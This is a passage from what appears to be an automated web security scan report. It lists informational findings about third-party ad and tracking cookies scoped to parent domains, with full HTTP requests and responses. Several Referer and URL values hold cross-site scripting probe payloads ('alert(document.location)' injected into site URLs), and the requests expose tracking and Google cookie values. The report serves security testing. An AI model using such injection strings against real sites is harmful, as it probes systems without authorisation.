Path:   /wildfire/IMP/CXNID=2000002.0NXC/bT*xJmx*PTEyNDQ3NDEyOTY5MTImcHQ9MTI*NDc*MTMwMjIwOSZwPTQyNTgyMyZkPSZnPTImdD*mbz*2MTBjODEwNzJhYmE*ZDBjYjBkMWE5NjE3ZTNkOTA*YSZzPWFudGlxdWV3ZWVrLmNvbSZvZj*w.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /wildfire/IMP/CXNID=2000002.0NXC/bT*xJmx*PTEyNDQ3NDEyOTY5MTImcHQ9MTI*NDc*MTMwMjIwOSZwPTQyNTgyMyZkPSZnPTImdD*mbz*2MTBjODEwNzJhYmE*ZDBjYjBkMWE5NjE3ZTNkOTA*YSZzPWFudGlxdWV3ZWVrLmNvbSZvZj*w.gif HTTP/1.1
Host: counters.gigya.com
Proxy-Connection: keep-alive
Referer: http://www.observer.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ucid=RFq8Ln1vPSaBPMmq4LEJ0w==; _mkto_trk=id:672-YBF-078&token:_mch-gigya.com-1314893715569-60156; __utma=246645010.642220752.1314893716.1314893716.1314893716.1; __utmz=246645010.1314893716.1.1.utmcsr=iab.net|utmccn=(referral)|utmcmd=referral|utmcct=/site_map

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 12 Sep 2011 12:48:08 GMT
Server: Microsoft-IIS/6.0
P3P: CP="IDC COR PSA DEV ADM OUR IND ONL"
x-server: web204
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Connection: close
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: GF_1640683793=http://www.observer.com/; path=/
Set-Cookie: GF_1640683793=http://www.observer.com/; domain=gigya.com; path=/
Set-Cookie: GP_12447412969121244741302209=1640683793; path=/
Set-Cookie: GP_12447412969121244741302209=1640683793; domain=gigya.com; path=/
Set-Cookie: UUID=816512b5f435493ea41e36fb7f1fa2e6; expires=Sun, 12-Sep-2021 12:48:08 GMT; path=/
Set-Cookie: UUID=816512b5f435493ea41e36fb7f1fa2e6; domain=gigya.com; expires=Sun, 12-Sep-2021 12:48:08 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;

10.18. http://d7.zedo.com/bar/v16-504/d3/jsc/gl.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-504/d3/jsc/gl.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bar/v16-504/d3/jsc/gl.js?k5xiThcyanucBq9IXvhSGSz5~090311 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=1545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFgeo=5386156; ZCBC=1; FFMChanCap=2457780B305,825#722607,7038#1013066:767,4#789954|0,1#0,24:0,10#0,24:0,1#0,24; FFSkp=305,7040,15,1:; ZEDOIDX=13; FFMCap=2457900B1185,234056,234851,234925:933,196008:826,110235,110236|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24:0,10#0,24:0,10#0,24; FFcat=826,622,14:1545,8,14:826,622,9:1545,8,9:305,7040,15:305,7038,15; FFad=0:0:0:0:0:0; PI=h484782Za669089Zc826000622,826000622Zs403Zt1255Zm768Zb43199; aps=2
If-None-Match: "436874d-5d7-4aa4ddaecd340"

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 399
Content-Type: application/x-javascript
Set-Cookie: FFgeo=5386156;expires=Tue, 11 Sep 2012 12:49:18 GMT;domain=.zedo.com;path=/;
ETag: "9e27dc-5d7-4aa4ddaecd340"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=419812
Expires: Sat, 17 Sep 2011 09:26:10 GMT
Date: Mon, 12 Sep 2011 12:49:18 GMT
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var zzl='en-US';


if(typeof zzGeo=='undefined'){
var zzGeo=254;}
if(typeof zzCountry=='undefined'){
var zzCountry=255;}
if(typeof
...[SNIP]...

10.19. http://d7.zedo.com/img/bh.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /img/bh.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /img/bh.gif?n=826&g=20&a=1600&s=1&l=1&t=e&e=1 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://rs.gwallet.com/r1/pixel/x420r5075003
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; ZCBC=1; FFMChanCap=2457780B305,825#722607,7038#1013066:767,4#789954|0,1#0,24:0,10#0,24:0,1#0,24; FFSkp=305,7040,15,1:; ZEDOIDX=13; PI=h484782Za669089Zc826000622,826000622Zs403Zt1255Zm768Zb43199; aps=2; FFgeo=5386156; FFcat=933,56,15:826,622,14:1545,8,14:826,622,9:1545,8,9:305,7040,15:305,7038,15; FFad=1:0:0:0:0:0:0; FFMCap=2457900B1185,234056,234851,234925:933,196008:826,110235,110236|0,1#0,24:0,1#0,24:0,1#0,24:0,10#0,24:0,10#0,24:0,10#0,24

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 47
Content-Type: image/gif
Set-Cookie: ZFFAbh=977B826,20|121_977#365;expires=Sun, 11 Dec 2011 12:49:31 GMT;domain=.zedo.com;path=/;
Set-Cookie: ZFFBbh=985B826,20|121_977#0;expires=Tue, 11 Sep 2012 12:49:31 GMT;domain=.zedo.com;path=/;
ETag: "1b6340a-de5c-4a8e0f9fb9dc0"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=8401
Expires: Mon, 12 Sep 2011 15:09:32 GMT
Date: Mon, 12 Sep 2011 12:49:31 GMT
Connection: close

GIF89a.............!.......,...........D..;



10.20. http://d7.zedo.com/utils/ecSet.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /utils/ecSet.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /utils/ecSet.js?v=PI=h484782Za669088Zc826000622%2C826000622Zs403Zt1255Zm768Zb43199&d=.zedo.com HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFgeo=5386156; ZCBC=1; FFMChanCap=2457780B305,825#722607,7038#1013066:767,4#789954|0,1#0,24:0,10#0,24:0,1#0,24; PI=h1201513Za1013066Zc305007038,305007038Zs608Zt1255Zm768Zb43199; FFSkp=305,7040,15,1:; ZEDOIDX=13; FFMCap=2457900B1185,234056,234851,234925:933,196008:826,110235|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24:0,10#0,24; FFcat=826,622,9:1545,8,9:305,7040,15:305,7038,15; FFad=0:0:0:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 1
Content-Type: application/x-javascript
Set-Cookie: PI=h484782Za669088Zc826000622,826000622Zs403Zt1255Zm768Zb43199;expires=Wed, 12 Oct 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "3a9d5cb-1f5-47f2908ed51c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=945
Date: Mon, 12 Sep 2011 12:48:46 GMT
Connection: close



10.21. http://dts1.raasnet.com/dts/bizo/in  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dts1.raasnet.com
Path:   /dts/bizo/in

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dts/bizo/in?industry=business_services&location=texas HTTP/1.1
Host: dts1.raasnet.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://p.raasnet.com/partners/universal/in?pid=1965&channel=fc_homepage&ndl=http%3A//www.fastcompany.com/%3Fa9939%2522%253E%253Cscript%253Ealert%28document.location%29%253C/script%253E44507fb50f4%3D1&ndr=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&pt=&et=&t=f
Cookie: o=0; u=153094112679120; ubd=AtEmSNACJQAAA8ZOQvzu; lpp=1965

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Pragma: no-cache
Cache-Control: private, no-cache, no-store, max-age=0
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Set-Cookie: u=153094112679120; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:19:28 GMT;
Set-Cookie: o=0; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:19:28 GMT;
Set-Cookie: lpp=1965; path=/; domain=.raasnet.com; expires=Mon, 12-Sep-2011 13:08:08 GMT;
Content-Type: image/jpeg
Content-Length: 0
Date: Mon, 12 Sep 2011 13:06:07 GMT
Connection: close


10.22. http://dts1.raasnet.com/dts/exelate/in  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dts1.raasnet.com
Path:   /dts/exelate/in

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dts/exelate/in?segments=&t=i HTTP/1.1
Host: dts1.raasnet.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://p.raasnet.com/partners/universal/in?pid=1965&channel=fc_homepage&ndl=http%3A//www.fastcompany.com/%3Fa9939%2522%253E%253Cscript%253Ealert%28document.location%29%253C/script%253E44507fb50f4%3D1&ndr=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&pt=&et=&t=f
Cookie: o=0; u=153094112679120; ubd=AtEmSNACJQAAA8ZOQvzu; lpp=1965

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Pragma: no-cache
Cache-Control: private, no-cache, no-store, max-age=0
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Set-Cookie: u=153094112679120; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:19:27 GMT;
Set-Cookie: o=0; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:19:27 GMT;
Set-Cookie: lpp=1965; path=/; domain=.raasnet.com; expires=Mon, 12-Sep-2011 13:08:07 GMT;
Content-Type: image/jpeg
Content-Length: 0
Date: Mon, 12 Sep 2011 13:06:07 GMT
Connection: close


10.23. http://dts1.raasnet.com/dts/targus  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dts1.raasnet.com
Path:   /dts/targus

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dts/targus?segment=000&zip=&fage=&fgender=&fts=&sage=&sgender=&sts= HTTP/1.1
Host: dts1.raasnet.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://p.raasnet.com/partners/universal/in?pid=1965&channel=fc_homepage&ndl=http%3A//www.fastcompany.com/%3Fa9939%2522%253E%253Cscript%253Ealert%28document.location%29%253C/script%253E44507fb50f4%3D1&ndr=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&pt=&et=&t=f
Cookie: o=0; u=153094112679120; ubd=AtEmSNACJQAAA8ZOQvzu; lpp=1965

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Pragma: no-cache
Cache-Control: private, no-cache, no-store, max-age=0
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Set-Cookie: u=153094112679120; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:19:27 GMT;
Set-Cookie: o=0; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:19:27 GMT;
Set-Cookie: lpp=1965; path=/; domain=.raasnet.com; expires=Mon, 12-Sep-2011 13:08:07 GMT;
Content-Type: image/jpeg
Content-Length: 0
Date: Mon, 12 Sep 2011 13:06:07 GMT
Connection: close


10.24. http://f21.360tag.com/t6/1418/MTV/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://f21.360tag.com
Path:   /t6/1418/MTV/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /t6/1418/MTV/?rf=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&l=en-US&pg=http%3A%2F%2Fwww.mtv.co.uk%2Ffiles4e2a2%2522-alert(document.location)-%25226efac768962%2Ffavicon.ico&pl=Win32&cd=16&rs=1920x1200&tz=300&je=true&rn=1405901022&at=PageView&tv=1&t360_T=2&t360_RN2=1967621374&t360_Referrer=&txd=360tag.com HTTP/1.1
Host: f21.360tag.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/files4e2a2%22-alert(document.location)-%226efac768962/favicon.ico
Cookie: t1=N1

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: private,no-cache, must-revalidate, max-age=0
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Location: http://www.googleadservices.com/pagead/conversion/1066373836/?label=hLH-CJz7gQIQzKW-_AM&guid=ON&script=0
Set-Cookie: tguid=d37d83f3-b7f3-4436-ae61-5a4ec6697d9e; domain=.360tag.com; expires=Sun, 12-Sep-2021 13:05:06 GMT; path=/
Set-Cookie: tid=0; domain=.360tag.com; expires=Sun, 11-Sep-2011 13:05:06 GMT; path=/
Set-Cookie: sguid=466d899d-3f45-470d-9e6b-6f8d7ed32ebd; domain=.360tag.com; path=/
X-Powered-By: PHP/5.2.11
Server: Apache/2.2.14
P3P: CP="NOI DSP COR CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC", policyref="http://www.360tag.com/w3c/p3p.xml"
Date: Mon, 12 Sep 2011 13:05:05 GMT
Content-Length: 0


10.25. http://id.google.com/verify/EAAAABWZtieoFhZd9XdhbVhtYuQ.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://id.google.com
Path:   /verify/EAAAABWZtieoFhZd9XdhbVhtYuQ.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAABWZtieoFhZd9XdhbVhtYuQ.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=ciphertext+data+security
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=50=VxiZX7aDTPwjxYwwBhemPWg4il135P9dB2f5oOVsmg=O6gY64Xq_XczkJ5S; PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=MmnHHrVyllkn5fUstvfqnPtDp4u0CWWdVJvI2wnRNCbJ0VTX3xRmmWIdcUNum52LGTHmJ4SicY09qkVQjFkDETjGrBCKXQoY7-i_aw4mT0NH1g_cavbeS6OkojcbVt7T

Response

HTTP/1.1 200 OK
Set-Cookie: SNID=51=yIRx5Ncw2Xe2RRfVKKbf2FR3nodRYFt3JPr2L80Fxg=WeGf3ZdyaGOKCq62; expires=Tue, 13-Mar-2012 12:41:17 GMT; path=/verify; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Mon, 12 Sep 2011 12:41:17 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

10.26. http://id.google.com/verify/EAAAAM9br7WwFClt2Y62Ukg62vk.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://id.google.com
Path:   /verify/EAAAAM9br7WwFClt2Y62Ukg62vk.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAAM9br7WwFClt2Y62Ukg62vk.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/blank.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=51=yIRx5Ncw2Xe2RRfVKKbf2FR3nodRYFt3JPr2L80Fxg=WeGf3ZdyaGOKCq62; PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=MmnHHrVyllkn5fUstvfqnPtDp4u0CWWdVJvI2wnRNCbJ0VTX3xRmmWIdcUNum52LGTHmJ4SicY09qkVQjFkDETjGrBCKXQoY7-i_aw4mT0NH1g_cavbeS6OkojcbVt7T

Response

HTTP/1.1 200 OK
Set-Cookie: NID=51=Lh__unmUq20T1IIqPNby3lnxFSUZGdvQ5_BieXTCVwXmSNjk57-to0QCiQto54PtZva07UOavPS_hgWY0dmvp105NE76_GwJkql9ucFgdgF_oJRWulkjljosco7JuoGh; expires=Tue, 13-Mar-2012 12:41:23 GMT; path=/; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Mon, 12 Sep 2011 12:41:23 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

10.27. http://image2.pubmatic.com/AdServer/Pug  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image2.pubmatic.com
Path:   /AdServer/Pug

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/Pug?vcode=0 HTTP/1.1
Host: image2.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=1545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_22=488-pcv:1|uid:2925993182975414771; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:49:57 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847; domain=pubmatic.com; expires=Sat, 06-Sep-2014 14:14:48 GMT; path=/
Content-Length: 42
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D.;

10.28. http://imp.fetchback.com/serve/fb/adtag.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /serve/fb/adtag.js?tid=68318&type=halfpage&clicktrack=http%3A%2F%2Fadserving%2Ecpxinteractive%2Ecom%2Fclk%3F3%2CeAGdS9sOgjAU%2DyEiuwCbLj4MiARhUXGI%2DobgLTg1EZ3x6w0qfIB96GlPW4gZ7RMMIdwRCvIcQMIgRnaZbx1kEQMwxgixMcEWdQx1S13uIifg%2Ety3Af9APLLx%2Eit5exs7pQ17XvSi8e9%2E3neFAMqwyf8FipJ2Gnpcf3WiovtShm6bcL%2DsJlkKRRCCOEsqgWa1kKOT8IAtgoWKZWGtZVkJuXquVYom3ZAPDeNQ19eBaWqte%2DeLvt43p2PRKy7KfANOHFZH%2C HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?msUBAB26GADSD50AAAAAAMvWJgAAAAAAAgAAAAAAAAAAAP8AAAACCKz8LgAAAAAAnggAAAAAAAAG1TIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2KRAAAAAAAAICAwAAAAAAGy.dJAYBFUAbL90kBgEVQAAAeoulitI.ZmZmZmZmAUAAAPi53LjYPzMzMzMzMwdAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABbksInE-S2CpsKXXVhy0SGaDsCy0zxGJguLNV6AAAAAA==,,http%3A%2F%2Fwww.nowpublic.com%2F,B%3D10%26Z%3D0x0%26_salt%3D1964679122%26anmember%3D541%26anprice%3D%26r%3D1%26s%3D1620509%26y%3D29,7d9e50b4-dd3d-11e0-90ef-78e7d161fe68
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: opt=1

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:38 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1315831718_1315831704896:4216901696863812; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Mon, 12 Sep 2011 12:48:38 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 554

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=68318&type=halfpage&clicktrack=http%3A%2F%2Fadserving%2Ecpxinteractive%2Ecom%2Fclk%3F3%2CeAGdS9sOgjAU%2DyEiuwCbLj4MiARhUXGI%2D
...[SNIP]...

10.29. http://imp.fetchback.com/serve/fb/imp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/imp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /serve/fb/imp?tid=68318&type=halfpage&clicktrack=http%3A%2F%2Fadserving%2Ecpxinteractive%2Ecom%2Fclk%3F3%2CeAGdS9sOgjAU%2DyEiuwCbLj4MiARhUXGI%2DobgLTg1EZ3x6w0qfIB96GlPW4gZ7RMMIdwRCvIcQMIgRnaZbx1kEQMwxgixMcEWdQx1S13uIifg%2Ety3Af9APLLx%2Eit5exs7pQ17XvSi8e9%2E3neFAMqwyf8FipJ2Gnpcf3WiovtShm6bcL%2DsJlkKRRCCOEsqgWa1kKOT8IAtgoWKZWGtZVkJuXquVYom3ZAPDeNQ19eBaWqte%2DeLvt43p2PRKy7KfANOHFZH%2C HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
